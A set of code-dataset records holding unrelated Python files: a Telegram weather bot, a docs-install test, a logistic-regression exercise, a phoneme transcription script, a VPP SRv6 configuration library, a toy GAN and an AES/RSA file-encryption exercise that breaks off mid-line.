\r\nHumidity: {umid} gr/ft3\r\nVisibility: {visi} miles\r\nRain: {rain} %\r\n\r\n> Day Data:\r\n{sum_day}\r\nWind: {wind_day} mph {wind_speed_warn_day}\r\nMax Temperature: {temp_day} ºF \r\nHumidity: {umid_day} gr/ft3\r\nVisibility: {visi_day} miles\r\nRain: {rain_day} %\r\n\r\nAerial Restriction:\r\n\t- \"\"\"\r\n\r\ndef start(update, context):\r\n context.bot.send_message(chat_id=update.message.chat_id, text=startText)\r\n\r\ndef exit(update, context):\r\n context.bot.send_message(chat_id=update.message.chat_id, text=\"Shutting Down...\")\r\n exit(9)\r\n raise SystemExit\r\n\r\nupdater = Updater(token=TELEGRAM_TOKEN, use_context=True)\r\ndispatcher = updater.dispatcher\r\nstart_handler = CommandHandler('start', start)\r\nexit_handler = CommandHandler('exit', exit)\r\ndispatcher.add_handler(start_handler)\r\ndispatcher.add_handler(exit_handler)\r\n\r\ndef lang(update, context):\r\n message = update.message\r\n if message.text == \"/lang\":\r\n context.bot.send_message(chat_id=update.message.chat_id, text=\"/lang {EN/PT/US}\")\r\n return\r\n if context.args[0].lower() == \"en\":\r\n repo[DB_NAME].users.update_one({'name': message.from_user.username},{'$set': {'name': message.from_user.username,'lang': 'en', 'units': 'si'}}, upsert=True)\r\n context.bot.send_message(chat_id=update.message.chat_id, text=\"Set to EN\")\r\n if context.args[0].lower() == \"us\":\r\n repo[DB_NAME].users.update_one({'name': message.from_user.username},{'$set': {'name': message.from_user.username,'lang': 'en', 'units': 'us'}}, upsert=True)\r\n context.bot.send_message(chat_id=update.message.chat_id, text=\"Set to US\")\r\n if context.args[0].lower() == \"pt\":\r\n repo[DB_NAME].users.update_one({'name': message.from_user.username},{'$set': {'name': message.from_user.username,'lang': 'pt', 'units': 'si'}}, upsert=True)\r\n context.bot.send_message(chat_id=update.message.chat_id, text=\"Em Português.\")\r\n\r\n\r\ndef location(update, context):\r\n message = update.message\r\n request_data = {\r\n 'api_key': DARKSKY_TOKEN,\r\n 'latitude': message.location.latitude,\r\n 'longitude': message.location.longitude\r\n }\r\n\r\n message_log = {\r\n 'user': message.from_user.username,\r\n 'timestamp': message.date.timestamp(),\r\n 'lat': message.location.latitude,\r\n 'lon': message.location.longitude\r\n }\r\n\r\n userData = repo[DB_NAME].users.find_one({'name': message.from_user.username})\r\n params_query = {'units':'si', 'lang': 'pt'} \r\n 
if userData:\r\n params_query= userData\r\n\r\n requestURL = \"https://api.darksky.net/forecast/{api_key}/{latitude},{longitude}\".format_map(request_data)\r\n print(requestURL)\r\n r = requests.get(requestURL, params=params_query)\r\n\t\r\n if r.status_code == 200:\r\n datanow = r.json()[\"currently\"]\r\n dataday = r.json()[\"daily\"][\"data\"]\r\n print(dataday[0])\r\n selectData = {\r\n 'sum': datanow[\"summary\"],\r\n 'temp': datanow[\"temperature\"],\r\n 'rain': datanow[\"precipProbability\"] * 100,\r\n 'umid': datanow[\"humidity\"],\r\n 'wind': datanow[\"windSpeed\"],\r\n 'visi': datanow[\"visibility\"],\r\n 'sum_day': dataday[0][\"summary\"],\r\n 'temp_day': dataday[0][\"temperatureHigh\"],\r\n 'rain_day': dataday[0][\"precipProbability\"] * 100,\r\n 'umid_day': dataday[0][\"humidity\"],\r\n 'wind_day': dataday[0][\"windSpeed\"],\r\n 'visi_day': dataday[0][\"visibility\"],\r\n \"wind_speed_warn_now\": \"\",\r\n \"wind_speed_warn_day\": \"\"\r\n }\r\n \r\n c_mesg = messageFormat_br\r\n if userData[\"lang\"] == 'pt':\r\n c_mesg = messageFormat_br\r\n if userData[\"lang\"] == 'en':\r\n c_mesg = messageFormat_en\r\n if userData[\"units\"] == 'us':\r\n c_mesg = messageFormat_us \r\n \r\n if userData[\"units\"] == 'si':\r\n if int(selectData[\"wind\"]) >= 10:\r\n selectData.update({\"wind_speed_warn_now\": \"\"})\r\n if int(selectData[\"wind_day\"]) >= 10:\r\n selectData.update({\"wind_speed_warn_day\": \"\"})\r\n else:\r\n if int(selectData[\"wind\"]) >= 21:\r\n selectData.update({\"wind_speed_warn_now\": \"\"})\r\n if int(selectData[\"wind_day\"]) >= 21:\r\n selectData.update({\"wind_speed_warn_day\": \"\"})\r\n \r\n context.bot.send_message(chat_id=update.message.chat_id, text=c_mesg.format_map(selectData))\r\n repo[DB_NAME].logs.insert_one(message_log)\r\n\t\r\nlocation_handler = MessageHandler(Filters.location, location)\r\ndispatcher.add_handler(location_handler)\r\n\r\nlang_handler = CommandHandler('lang', lang)\r\ndispatcher.add_handler(lang_handler)\r\n\r\nupdater.start_polling()\r\n\r\n\r\n","sub_path":"Atmobot/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"29717732","text":"import os\n\ndocs = ['dev_guide', 'user_guide']\n\n\ndef test_that_docs_are_installed():\n for doc in docs:\n assert os.path.exists('/opt/venvs/zenterio-zk2/doc/{doc}/pdf/{doc}.pdf'.format(\n doc=doc)), 'PDF for {doc} was not installed'.format(doc=doc)\n assert os.path.exists('/opt/venvs/zenterio-zk2/doc/{doc}/html/index.html'.format(\n doc=doc)), 'HTML for {doc} was not installed'.format(doc=doc)\n","sub_path":"k2/systest/debtest/doc.py","file_name":"doc.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"477739910","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport h5py\nimport scipy\nfrom PIL import Image\nfrom scipy import ndimage\nfrom week2.lr_utils import load_dataset\n\n\ndef sigmoid(z):\n \"\"\"\n Compute the sigmoid of z\n\n Arguments:\n z -- A scalar or numpy array of any size.\n\n Return:\n s -- sigmoid(z)\n \"\"\"\n\n s = 1/(1 + np.exp(-z))\n return s\n\n\ndef initialize_with_zeros(dim):\n \"\"\"\n This function creates a vector of zeros of shape (dim, 1) for w and initializes b to 0.\n\n Argument:\n dim -- size of the w vector we want (or number of parameters in this case)\n\n Returns:\n w -- initialized vector of shape (dim, 1)\n b -- initialized scalar 
(corresponds to the bias)\n \"\"\"\n\n w = np.zeros((dim, 1))\n b = 0\n\n assert (w.shape == (dim, 1))\n assert (isinstance(b, float) or isinstance(b, int))\n\n return w, b\n\ntrain_set_x_orig, train_set_y, test_set_x_orig, test_set_y, classes = load_dataset()\n\nm_train = train_set_y.shape[1] # 209 training examples\nm_test = test_set_y.shape[1] # 50 Testing examples\nnum_px = train_set_x_orig.shape[1] # 64 by 64 by 3\n\n### START CODE HERE ### (≈ 2 lines of code)\ntrain_set_x_flatten = train_set_x_orig.reshape(train_set_x_orig.shape[0], -1).T\ntest_set_x_flatten = test_set_x_orig.reshape(test_set_x_orig.shape[0], -1).T\n### END CODE HERE ###\n\nprint(\"train_set_x_flatten shape: \" + str(train_set_x_flatten.shape))\nprint(\"train_set_y shape: \" + str(train_set_y.shape))\nprint(\"test_set_x_flatten shape: \" + str(test_set_x_flatten.shape))\nprint(\"test_set_y shape: \" + str(test_set_y.shape))\nprint(\"sanity check after reshaping: \" + str(train_set_x_flatten[0:5,0]))\nprint(\"sigmoid([0, 2]) = \" + str(sigmoid(np.array([0,2]))))\n\ndim = 2\nw, b = initialize_with_zeros(dim)\nprint (\"w = \" + str(w))\nprint (\"b = \" + str(b))\n\nprint('done')\n","sub_path":"week2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"338548993","text":"\n# coding: utf-8\n\nimport os\nimport pandas as pd\nimport numpy as np\nimport cmudict\nimport nltk\n\nnltk.download('punkt')\nprondict = cmudict.dict()\ndir_path = os.path.abspath('.')\nexl_path = dir_path + r'/sum_100.csv'\nprint(exl_path)\ndf = pd.read_csv(exl_path,engine='python',keep_default_na=False)\n\nstr_list= []\npro_origin_list =[]\npro_result_list = []\nsame_list = []\nchar_rep_rate_list =[]\nchar_full_list = []\n\ndef split_tran(txt):\n txt_revise = txt.replace(\",\", '').replace(\".\", '')\n split_result = nltk.word_tokenize(txt_revise)\n for i in range(len(split_result)):\n split_result[i] = prondict[split_result[i].lower()]\n if split_result[i]:\n split_result[i] = split_result[i][0]\n return split_result\n\ndef list_str(list_tmp):\n result_str = \"\"\n for i in range(len(list_tmp)):\n str_tmp = [str(j) for j in list_tmp[i]]\n str_join_tmp = ' '.join(str_tmp)\n result_str = result_str + \" \" + str_join_tmp\n return result_str\n\nfor index, row in df.iterrows():\n list_origin = split_tran(row[\"Origin\"])\n list_result = split_tran(row[\"Result\"])\n\n pro_origin_list.append(list_str(list_origin))\n pro_result_list.append(list_str(list_result))\n # str_tmp = ''\n # if row[\"Origin\"] == row[\"Result\"]:\n # same_list.append(1)\n # else:\n # same_list.append(0)\n #\n # for i in row['Result']:\n # for j in row['Origin'].lower():\n # if i == j:\n # str_tmp = ''.join([str_tmp,i])\n # break\n # str_diff_tmp = ''.join([str_tmp,i])\n # # char_full_list.append(0)\n # # break\n # # print(str_tmp)\n # str_list.append(str_tmp)\n # if str_tmp == row['Result']:\n # char_full_list.append(1)\n # else:\n # char_full_list.append(0)\n # char_rep_rate = len(str_tmp.replace(\" \", \"\"))/len(str(row['origin']).replace(\" \", \"\"))\n # char_rep_rate_list.append(char_rep_rate)\ndf['pro_origin'] = pro_origin_list\ndf['pro_result'] = pro_result_list\n# df['same'] = same_list\n# df['align'] = str_list\n\n# same_number = len(df[df['same'].isin(1)])\n# df['char_rate'] = char_rep_rate_list\n# df['char_full'] = 
char_full_list\n\ndf.to_csv('result_100.csv')\n","sub_path":"code/process/pho_tran.py","file_name":"pho_tran.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"606662046","text":"# Copyright (c) 2017 Cisco and/or its affiliates.\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at:\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Segment Routing over IPv6 dataplane utilities library.\"\"\"\n\nfrom enum import Enum\n\nfrom resources.libraries.python.VatExecutor import VatTerminal\nfrom resources.libraries.python.VatJsonUtil import VatJsonUtil\nfrom resources.libraries.python.topology import Topology\n\n\nclass SRv6Behaviour(Enum):\n \"\"\"Defines SRv6 endpoint functions implemented in VPP.\"\"\"\n # Endpoint function\n END = 'end'\n # Endpoint function with Layer-3 cross-connect\n END_X = 'end.x'\n # Endpoint with decapsulation and Layer-2 cross-connect\n END_DX2 = 'end.dx2'\n # Endpoint with decapsulation and IPv4 cross-connect\n END_DX4 = 'end.dx4'\n # Endpoint with decapsulation and IPv4 table lookup\n END_DT4 = 'end.dt4'\n # Endpoint with decapsulation and IPv6 cross-connect\n END_DX6 = 'end.dx6'\n # Endpoint with decapsulation and IPv6 table lookup\n END_DT6 = 'end.dt6'\n\n\nclass SRv6(object):\n \"\"\"SRv6 class.\"\"\"\n\n def __init__(self):\n pass\n\n @staticmethod\n def configure_sr_localsid(node, local_sid, behavior, interface=None,\n next_hop=None, fib_table=None):\n \"\"\"Create SRv6 LocalSID and binds it to a particular behaviour on\n the given node.\n\n :param node: Given node to create localSID on.\n :param local_sid: LocalSID IPv6 address.\n :param behavior: SRv6 LocalSID function.\n :param interface: Interface name (Optional, required for\n L2/L3 xconnects).\n :param next_hop: Next hop IPv4/IPv6 address (Optional, required for L3\n xconnects).\n :param fib_table: FIB table for IPv4/IPv6 lookup (Optional, required for\n L3 routing).\n :type node: dict\n :type local_sid: str\n :type behavior: str\n :type interface: str\n :type next_hop: int\n :type fib_table: str\n :raises ValueError: If unsupported SRv6 LocalSID function used or\n required parameter is missing.\n \"\"\"\n if behavior == SRv6Behaviour.END:\n params = ''\n elif behavior in [SRv6Behaviour.END_X, SRv6Behaviour.END_DX4,\n SRv6Behaviour.END_DX6]:\n if interface is None or next_hop is None:\n raise ValueError('Required data missing.\\ninterface:{0}\\n'\n 'next_hop:{1}'.format(interface, next_hop))\n interface_name = Topology.get_interface_name(node, interface)\n params = '{0} {1}'.format(interface_name, next_hop)\n elif behavior == SRv6Behaviour.END_DX2:\n if interface is None:\n raise ValueError('Required data missing.\\ninterface:{0}\\n'.\n format(interface))\n params = '{0}'.format(interface)\n elif behavior in [SRv6Behaviour.END_DT4, SRv6Behaviour.END_DT6]:\n if fib_table is None:\n raise ValueError('Required data missing.\\nfib_table:{0}\\n'.\n format(fib_table))\n params = '{0}'.format(fib_table)\n else:\n raise ValueError('Unsupported SRv6 LocalSID function: 
{0}'.\n format(behavior))\n\n with VatTerminal(node) as vat:\n resp = vat.vat_terminal_exec_cmd_from_template(\n 'srv6/sr_localsid_add.vat', local_sid=local_sid,\n behavior=behavior, params=params)\n\n VatJsonUtil.verify_vat_retval(\n resp[0],\n err_msg='Create SRv6 LocalSID {0} failed on node {1}'.format(\n local_sid, node['host']))\n\n @staticmethod\n def delete_sr_localsid(node, local_sid):\n \"\"\"Delete SRv6 LocalSID on the given node.\n\n :param node: Given node to delete localSID on.\n :param local_sid: LocalSID IPv6 address.\n :type node: dict\n :type local_sid: str\n \"\"\"\n with VatTerminal(node) as vat:\n resp = vat.vat_terminal_exec_cmd_from_template(\n 'srv6/sr_localsid_del.vat', local_sid=local_sid)\n\n VatJsonUtil.verify_vat_retval(\n resp[0],\n err_msg='Delete SRv6 LocalSID {0} failed on node {1}'.format(\n local_sid, node['host']))\n\n @staticmethod\n def show_sr_localsids(node):\n \"\"\"Show SRv6 LocalSIDs on the given node.\n\n :param node: Given node to show localSIDs on.\n :type node: dict\n \"\"\"\n with VatTerminal(node) as vat:\n vat.vat_terminal_exec_cmd_from_template(\n 'srv6/sr_localsids_show.vat')\n\n @staticmethod\n def configure_sr_policy(node, bsid, sid_list, mode='encap'):\n \"\"\"Create SRv6 policy on the given node.\n\n :param node: Given node to create SRv6 policy on.\n :param bsid: BindingSID - local SID IPv6 address.\n :param sid_list: SID list.\n :param mode: Encapsulation / insertion mode.\n :type node: dict\n :type bsid: str\n :type sid_list: list\n :type mode: str\n \"\"\"\n sid_conf = 'next ' + ' next '.join(sid_list)\n\n with VatTerminal(node) as vat:\n resp = vat.vat_terminal_exec_cmd_from_template(\n 'srv6/sr_policy_add.vat', bsid=bsid,\n sid_conf=sid_conf, mode=mode)\n\n VatJsonUtil.verify_vat_retval(\n resp[0],\n err_msg='Create SRv6 policy for BindingSID {0} failed on node '\n '{1}'.format(bsid, node['host']))\n\n @staticmethod\n def delete_sr_policy(node, bsid):\n \"\"\"Delete SRv6 policy on the given node.\n\n :param node: Given node to delete SRv6 policy on.\n :param bsid: BindingSID IPv6 address.\n :type node: dict\n :type bsid: str\n \"\"\"\n with VatTerminal(node) as vat:\n resp = vat.vat_terminal_exec_cmd_from_template(\n 'srv6/sr_policy_del.vat', bsid=bsid)\n\n VatJsonUtil.verify_vat_retval(\n resp[0],\n err_msg='Delete SRv6 policy for BindingSID {0} failed on node '\n '{1}'.format(bsid, node['host']))\n\n @staticmethod\n def show_sr_policies(node):\n \"\"\"Show SRv6 policies on the given node.\n\n :param node: Given node to show SRv6 policies on.\n :type node: dict\n \"\"\"\n with VatTerminal(node, json_param=False) as vat:\n vat.vat_terminal_exec_cmd_from_template(\n 'srv6/sr_policies_show.vat')\n\n @staticmethod\n def configure_sr_steer(node, mode, bsid, interface=None, ip_addr=None,\n mask=None):\n \"\"\"Create SRv6 steering policy on the given node.\n\n :param node: Given node to create steering policy on.\n :param mode: Mode of operation - L2 or L3.\n :param bsid: BindingSID - local SID IPv6 address.\n :param interface: Interface name (Optional, required in case of\n L2 mode).\n :param ip_addr: IPv4/IPv6 address (Optional, required in case of L3\n mode).\n :param mask: IP address mask (Optional, required in case of L3 mode).\n :type node: dict\n :type mode: str\n :type bsid: str\n :type interface: str\n :type ip_addr: int\n :type mask: int\n :raises ValueError: If unsupported mode used or required parameter\n is missing.\n \"\"\"\n if mode == 'l2':\n if interface is None:\n raise ValueError('Required data 
missing.\\ninterface:{0}\\n'.\n format(interface))\n interface_name = Topology.get_interface_name(node, interface)\n params = 'l2 {0}'.format(interface_name)\n elif mode == 'l3':\n if ip_addr is None or mask is None:\n raise ValueError('Required data missing.\\nIP address:{0}\\n'\n 'mask:{1}'.format(ip_addr, mask))\n params = '{0}/{1}'.format(ip_addr, mask)\n else:\n raise ValueError('Unsupported mode: {0}'.format(mode))\n\n with VatTerminal(node) as vat:\n resp = vat.vat_terminal_exec_cmd_from_template(\n 'srv6/sr_steer_add_del.vat', params=params, bsid=bsid)\n\n VatJsonUtil.verify_vat_retval(\n resp[0],\n err_msg='Create SRv6 steering policy for BindingSID {0} failed on '\n 'node {1}'.format(bsid, node['host']))\n\n @staticmethod\n def delete_sr_steer(node, mode, bsid, interface=None, ip_addr=None,\n mask=None):\n \"\"\"Delete SRv6 steering policy on the given node.\n\n :param node: Given node to delete steering policy on.\n :param mode: Mode of operation - L2 or L3.\n :param bsid: BindingSID - local SID IPv6 address.\n :param interface: Interface name (Optional, required in case of\n L2 mode).\n :param ip_addr: IPv4/IPv6 address (Optional, required in case of L3\n mode).\n :param mask: IP address mask (Optional, required in case of L3 mode).\n :type node: dict\n :type mode: str\n :type bsid: str\n :type interface: str\n :type ip_addr: int\n :type mask: int\n :raises ValueError: If unsupported mode used or required parameter\n is missing.\n \"\"\"\n params = 'del'\n if mode == 'l2':\n if interface is None:\n raise ValueError('Required data missing.\\ninterface:{0}\\n'.\n format(interface))\n interface_name = Topology.get_interface_name(node, interface)\n params += 'l2 {0}'.format(interface_name)\n elif mode == 'l3':\n if ip_addr is None or mask is None:\n raise ValueError('Required data missing.\\nIP address:{0}\\n'\n 'mask:{1}'.format(ip_addr, mask))\n params += '{0}/{1}'.format(ip_addr, mask)\n else:\n raise ValueError('Unsupported mode: {0}'.format(mode))\n\n with VatTerminal(node) as vat:\n resp = vat.vat_terminal_exec_cmd_from_template(\n 'srv6/sr_steer_add_del.vat', params=params, bsid=bsid)\n\n VatJsonUtil.verify_vat_retval(\n resp[0],\n err_msg='Delete SRv6 policy for bsid {0} failed on node {1}'.format(\n bsid, node['host']))\n\n @staticmethod\n def show_sr_steering_policies(node):\n \"\"\"Show SRv6 steering policies on the given node.\n\n :param node: Given node to show SRv6 steering policies on.\n :type node: dict\n \"\"\"\n with VatTerminal(node, json_param=False) as vat:\n vat.vat_terminal_exec_cmd_from_template(\n 'srv6/sr_steer_policies_show.vat')\n","sub_path":"resources/libraries/python/SRv6.py","file_name":"SRv6.py","file_ext":"py","file_size_in_byte":11215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"400232648","text":"import tensorflow as tf\nfrom easydict import EasyDict as edict\nfrom tensorflow.python import keras\nfrom tensorflow.python.keras import layers\n\nfrom gans.callbacks import saver\nfrom gans.models import sequential\nfrom gans.trainers import optimizers\nfrom gans.trainers import vanilla_gan_trainer\n\nmodel_parameters = edict({\n 'batch_size': 256,\n 'num_epochs': 15,\n 'buffer_size': 100000,\n 'latent_size': 5,\n 'learning_rate_generator': 0.0002,\n 'learning_rate_discriminator': 0.0002,\n 'save_images_every_n_steps': 20\n})\n\n\ndef generate_samples(num_samples):\n x = tf.random.uniform(shape=[num_samples], minval=-10, maxval=10)\n y = tf.nn.sigmoid(x)\n data = tf.stack([x, y], axis=1)\n 
return tf.data.Dataset. \\\n from_tensor_slices(data). \\\n shuffle(model_parameters.buffer_size). \\\n batch(model_parameters.batch_size)\n\n\ndataset = generate_samples(num_samples=500000)\n\n\ndef validation_dataset():\n return tf.random.normal([model_parameters.batch_size, model_parameters.latent_size])\n\n\nvalidation_dataset = validation_dataset()\n\ngenerator = sequential.SequentialModel(\n layers=[\n keras.Input(shape=[model_parameters.latent_size]),\n layers.Dense(units=15),\n layers.ELU(),\n layers.Dense(units=10),\n layers.ELU(),\n layers.Dense(units=5),\n layers.ELU(),\n layers.Dense(units=2, activation='linear'),\n ]\n)\n\ndiscriminator = sequential.SequentialModel(\n [\n keras.Input(shape=[2]),\n layers.Dense(units=25, activation='relu'),\n layers.Dense(units=15, activation='relu'),\n layers.Dense(units=10, activation='relu'),\n layers.Dense(units=2, activation='sigmoid'),\n ]\n)\n\ngenerator_optimizer = optimizers.Adam(\n learning_rate=model_parameters.learning_rate_generator,\n beta_1=0.5,\n)\ndiscriminator_optimizer = optimizers.Adam(\n learning_rate=model_parameters.learning_rate_discriminator,\n beta_1=0.5,\n)\n\ncallbacks = [\n saver.FunctionProblemSaver(\n save_images_every_n_steps=model_parameters.save_images_every_n_steps,\n )\n]\n\ngan_trainer = vanilla_gan_trainer.VanillaGANTrainer(\n batch_size=model_parameters.batch_size,\n generator=generator,\n discriminator=discriminator,\n training_name='VANILLA_GAN_MODEL_SIGMOID',\n generator_optimizer=generator_optimizer,\n discriminator_optimizer=discriminator_optimizer,\n latent_size=model_parameters.latent_size,\n continue_training=False,\n save_images_every_n_steps=model_parameters.save_images_every_n_steps,\n validation_dataset=validation_dataset,\n callbacks=callbacks,\n)\n\ngan_trainer.train(\n dataset=dataset,\n num_epochs=model_parameters.num_epochs,\n)\n","sub_path":"Experimentation/MnistGAN/gans2/examples/vanilla_gan_function_modeling_sigmoid.py","file_name":"vanilla_gan_function_modeling_sigmoid.py","file_ext":"py","file_size_in_byte":2759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"398983794","text":"import os\r\nimport os.path\r\nimport base64\r\nimport json\r\nfrom cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\r\nfrom cryptography.hazmat.backends import default_backend\r\nfrom cryptography.hazmat.primitives import padding as paddingPK\r\nfrom cryptography.hazmat.primitives.asymmetric import padding as paddingOA\r\nfrom cryptography.hazmat.primitives.asymmetric import rsa\r\nfrom cryptography.hazmat.primitives import serialization\r\nfrom cryptography.hazmat.primitives import hashes, hmac\r\n\r\nbackend = default_backend()\r\n\r\ndef Myencrypt(message, key):\r\n # Check to see if the key is at least 32 bytes\r\n if(len(key) < 32):\r\n raise ValueError('The key is too short! 
(Must be 32 bytes in length.)')\r\n \r\n # Generate iv and initialized ciper and encryptor objects\r\n iv = os.urandom(16)\r\n cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend=backend)\r\n encryptor = cipher.encryptor()\r\n \r\n # Initialize the padder object\r\n padder = paddingPK.PKCS7(128).padder()\r\n # Techinically useless but too scared to remove\r\n byte_message = message\r\n # Adds padding to the data\r\n padded_data = padder.update(byte_message)\r\n padded_data += padder.finalize()\r\n \r\n # Encrypt the padded data\r\n ct = encryptor.update(padded_data) + encryptor.finalize()\r\n \r\n # Store the ct and iv in a dictionary\r\n temp_data = {}\r\n temp_data['ct'] = ct\r\n temp_data['iv'] = iv\r\n \r\n return temp_data\r\n\r\n\r\ndef Mydecrypt(ciphertext, key, iv):\r\n # Initialize the cipher and decryptor objects\r\n cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend=backend)\r\n decryptor = cipher.decryptor()\r\n \r\n # Decrypts the padded data\r\n padded_data = decryptor.update(ciphertext) + decryptor.finalize()\r\n \r\n # Initializes the unpadder object\r\n unpadder = paddingPK.PKCS7(128).unpadder()\r\n \r\n # Unpad the data\r\n data = unpadder.update(padded_data)\r\n data += unpadder.finalize()\r\n return data\r\n\r\n\r\ndef Myfileencrypt(filepath):\r\n # Generate a random key\r\n key = os.urandom(32)\r\n \r\n # Extract the filename and extension\r\n file_name = os.path.basename(filepath)\r\n extension = os.path.splitext(file_name)[1]\r\n \r\n # Check if the file is a text file or an image\r\n # Then opens the file and stores the data\r\n with open(filepath, \"rb\") as file:\r\n file_data = file.read()\r\n\r\n # Encrypt the data\r\n enc_data = Myencrypt(file_data, key)\r\n \r\n # Encode the ciphertext\r\n ct = enc_data['ct']\r\n b64_ct = base64.b64encode(ct)\r\n str_ct = b64_ct.decode(\"utf-8\") \r\n \r\n # Encode the iv\r\n iv = enc_data['iv']\r\n b64_iv = base64.b64encode(iv)\r\n str_iv = b64_iv.decode(\"utf-8\") \r\n \r\n # Encode the key\r\n b64_key = base64.b64encode(key)\r\n str_key = b64_key.decode(\"utf-8\")\r\n \r\n # Store the data into a dictionary\r\n temp_data = {}\r\n temp_data['ct'] = str_ct\r\n temp_data['iv'] = str_iv\r\n temp_data['file_name'] = file_name\r\n temp_data['ext'] = extension\r\n temp_data['key'] = str_key\r\n \r\n # Convert the dictionary to a JSON\r\n json_str = json.dumps(temp_data)\r\n\r\n # Write the JSON to disk\r\n fh = open(file_name + \" json.txt\", \"w\")\r\n fh.write(json_str)\r\n \r\n # Return JSON filepath\r\n return file_name + \" json.txt\"\r\n \r\n\r\n # Input is JSON filepath\r\ndef Myfiledecrypt(json_filepath):\r\n \r\n # Read JSON from disk\r\n with open(json_filepath, \"rb\") as file:\r\n json_str = file.read()\r\n \r\n # Convert JSON to dictionary\r\n data = json.loads(json_str)\r\n \r\n # Extract the data in the dictionary\r\n key = data['key']\r\n ext = data['ext']\r\n iv = data['iv']\r\n file_name = data['file_name']\r\n \r\n # Decode the ct\r\n str_ct = data['ct']\r\n b64_ct = str_ct.encode(\"utf-8\")\r\n ct = base64.b64decode(b64_ct)\r\n \r\n # Decode the iv\r\n str_iv = data['iv']\r\n b64_iv = str_iv.encode(\"utf-8\")\r\n iv = base64.b64decode(b64_iv)\r\n \r\n # Decode the key\r\n str_key = data['key']\r\n b64_key = str_key.encode(\"utf-8\")\r\n key = base64.b64decode(b64_key)\r\n \r\n # Decrypt the ciphertext\r\n pt = Mydecrypt(ct, key, iv)\r\n \r\n # Check if the file is a text file or an image\r\n # Then generate a new file with the unencrypted data\r\n fh = open(file_name + \" unencrypted\" + ext, 
\"wb\")\r\n fh.write(pt)\r\n fh.close()\r\n \r\n return file_name + \" unencrypted\" + ext\r\n \r\ndef MyRSAEncrypt(filepath, RSA_publickey_filepath):\r\n \r\n # Encrypt the file data\r\n enc_data = Myfileencrypt(filepath)\r\n \r\n # Extract the data from the JSON\r\n with open(enc_data, \"rb\") as file:\r\n json_str = file.read()\r\n data = json.loads(json_str)\r\n ct = data['ct']\r\n iv = data['iv']\r\n ext = data['ext']\r\n file_name = data['file_name']\r\n str_key = data['key']\r\n \r\n # Read the RSA public key from disk\r\n with open(RSA_publickey_filepath, \"rb\") as key_file:\r\n public_key = serialization.load_pem_public_key(\r\n key_file.read(),\r\n backend=default_backend()\r\n )\r\n \r\n # Decode the key\r\n b64_key = str_key.encode(\"utf-8\")\r\n key = base64.b64decode(b64_key)\r\n \r\n # Encrypt the key\r\n RSA_ct = public_key.encrypt(\r\n key,\r\n paddingOA.OAEP(\r\n mgf=paddingOA.MGF1(algorithm=hashes.SHA256()),\r\n algorithm=hashes.SHA256(),\r\n label=None\r\n )\r\n )\r\n # Encode the ciphertext\r\n b64_RSA_ct = base64.b64encode(RSA_ct)\r\n str_RSA_ct = b64_RSA_ct.decode(\"utf-8\")\r\n \r\n # Package everything into a dictionary\r\n dict_data = {}\r\n dict_data['RSAcipher'] = str_RSA_ct\r\n dict_data['ct'] = ct\r\n dict_data['iv'] = iv\r\n dict_data['ext'] = ext\r\n dict_data['file_name'] = file_name\r\n \r\n # Convert the dictionary to a JSON\r\n json_str = json.dumps(dict_data)\r\n\r\n # Write the JSON to disk\r\n fh = open(file_name + \" json.txt\", \"w\")\r\n fh.write(json_str)\r\n \r\n # Return JSON filepath\r\n return file_name + \" json.txt\"\r\n \r\ndef MyRSADecrypt(json_filepath):\r\n \r\n # Read JSON from disk\r\n with open(json_filepath, \"rb\") as file:\r\n json_str = file.read()\r\n \r\n # Convert JSON to dictionary\r\n data = json.loads(json_str)\r\n \r\n # Unpackage the dictionary\r\n str_RSA_ct = data['RSAcipher']\r\n ct = data['ct']\r\n iv = data['iv']\r\n ext = data['ext']\r\n file_name = data['file_name']\r\n \r\n # Decode the ciphertext\r\n b64_RSA_ct = str_RSA_ct.encode(\"utf-8\") \r\n RSA_ct = base64.b64decode(b64_RSA_ct)\r\n \r\n # Read the private key from disk\r\n pr_key_path = \"RSA private key.pem\"\r\n with open(pr_key_path, \"rb\") as key_file:\r\n private_key = serialization.load_pem_private_key(\r\n key_file.read(),\r\n password=None,\r\n backend=default_backend()\r\n )\r\n # Decrypt the key\r\n key = private_key.decrypt(\r\n RSA_ct,\r\n paddingOA.OAEP(\r\n mgf=paddingOA.MGF1(algorithm=hashes.SHA256()),\r\n algorithm=hashes.SHA256(),\r\n label=None\r\n )\r\n )\r\n \r\n # Encode the key\r\n b64_key = base64.b64encode(key)\r\n str_key = b64_key.decode(\"utf-8\")\r\n \r\n # Generate a new JSON to pass into Myfiledecrypt\r\n dict_data = {}\r\n dict_data['ct'] = ct\r\n dict_data['iv'] = iv\r\n dict_data['ext'] = ext\r\n dict_data['file_name'] = file_name\r\n dict_data['key'] = str_key\r\n \r\n json_str = json.dumps(dict_data)\r\n \r\n fh = open(\"new\" + file_name + \" json.txt\", \"w\")\r\n fh.write(json_str)\r\n \r\n # Decrypt the file\r\n unenc_path = Myfiledecrypt(\"new\" + file_name + \" json.txt\")\r\n \r\n # Return the unencrypted file's path\r\n return unenc_path\r\n\r\n\r\ndef MyencryptMAC(message, EncKey, HMACKey):\r\n \r\n # Encrypt the file\r\n json_filepath = MyRSAEncrypt(message, EncKey)\r\n \r\n # Read the file from disk\r\n with open(json_filepath, 